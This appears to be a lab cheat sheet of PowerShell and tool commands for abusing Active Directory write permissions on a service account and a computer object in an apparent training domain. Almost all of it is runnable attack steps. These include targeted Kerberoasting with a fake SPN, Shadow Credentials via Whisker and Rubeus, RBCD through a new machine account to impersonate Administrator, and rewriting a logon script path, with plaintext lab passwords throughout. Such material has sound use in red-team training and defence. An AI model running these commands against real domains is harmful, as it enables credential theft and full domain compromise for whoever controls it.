PowerView setup and pre-check:
Import-Module .\PowerView.ps1
$Password = ConvertTo-SecureString 'StudentPass2026!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('OOTW\ben.carter', $Password)
$BenSid = ConvertTo-SID 'OOTW\ben.carter'
$GroupSid = ConvertTo-SID 'OOTW\ACL Operators'
Get-DomainObjectAcl -Identity 'svc_web' -ResolveGUIDs |
Where-Object { $_.SecurityIdentifier -in @($BenSid, $GroupSid) }
Get-DomainObject -Identity 'svc_web' -Properties servicePrincipalName,msDS-KeyCredentialLink,scriptPath,msDS-AllowedToActOnBehalfOfOtherIdentity
Targeted Kerberoast
Add a fake SPN only after checking the current SPN state. If the account already has SPNs, preserve them and restore the original list after the ticket is captured.
$OriginalSpns = (Get-DomainObject -Identity 'svc_web' -Properties servicePrincipalName).servicePrincipalName
Set-DomainObject -Identity 'svc_web' -Set @{servicePrincipalName='ootw/fake'} -Credential $Cred -Verbose
.\Rubeus.exe kerberoast /user:svc_web /nowrap /outfile:svc_web.tgs
if ($OriginalSpns) {
Set-DomainObject -Identity 'svc_web' -Set @{servicePrincipalName=$OriginalSpns} -Credential $Cred -Verbose
} else {
Set-DomainObject -Identity 'svc_web' -Clear servicePrincipalName -Credential $Cred -Verbose
}
Native AD module append/remove is cleaner when RSAT is available:
Set-ADUser -Identity 'svc_web' -ServicePrincipalNames @{Add='ootw/fake'}
setspn -L svc_web
Set-ADUser -Identity 'svc_web' -ServicePrincipalNames @{Remove='ootw/fake'}
Shadow Credentials
.\Whisker.exe add /target:svc_web /domain:ootw.local /dc:OOTW-DC01.ootw.local /path:svc_web.pfx /password:PfxPass2026!
.\Rubeus.exe asktgt /user:svc_web /certificate:svc_web.pfx /password:PfxPass2026! /domain:ootw.local /dc:OOTW-DC01.ootw.local /getcredentials /nowrap
Computer Target: RBCD Bridge
When the target is a computer object, write resource-based constrained delegation and request a service ticket through the controlled machine account.
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount LABATTACK -Password $(ConvertTo-SecureString 'MachinePass2026!' -AsPlainText -Force)
If using PowerView to write the RBCD security descriptor, build the descriptor for the controlled machine SID and set it on msDS-AllowedToActOnBehalfOfOtherIdentity.
$ComputerSid = Get-DomainComputer LABATTACK -Properties objectsid | Select-Object -ExpandProperty objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)"
$Bytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($Bytes, 0)
Set-DomainObject -Identity 'TARGETCOMPUTER$' -Set @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$Bytes} -Credential $Cred -Verbose
Use the controlled machine account to request a service ticket:
.\Rubeus.exe s4u /user:LABATTACK$ /password:MachinePass2026! /impersonateuser:Administrator /msdsspn:cifs/TARGETCOMPUTER.ootw.local /domain:ootw.local /ptt
Logon Script Attribute
Set-DomainObject -Identity 'svc_web' -Set @{scriptPath='logon.bat'} -Credential $Cred -Verbose
Get-DomainObject -Identity 'svc_web' -Properties scriptPath
Set-DomainObject -Identity 'svc_web' -Clear scriptPath -Credential $Cred -Verbose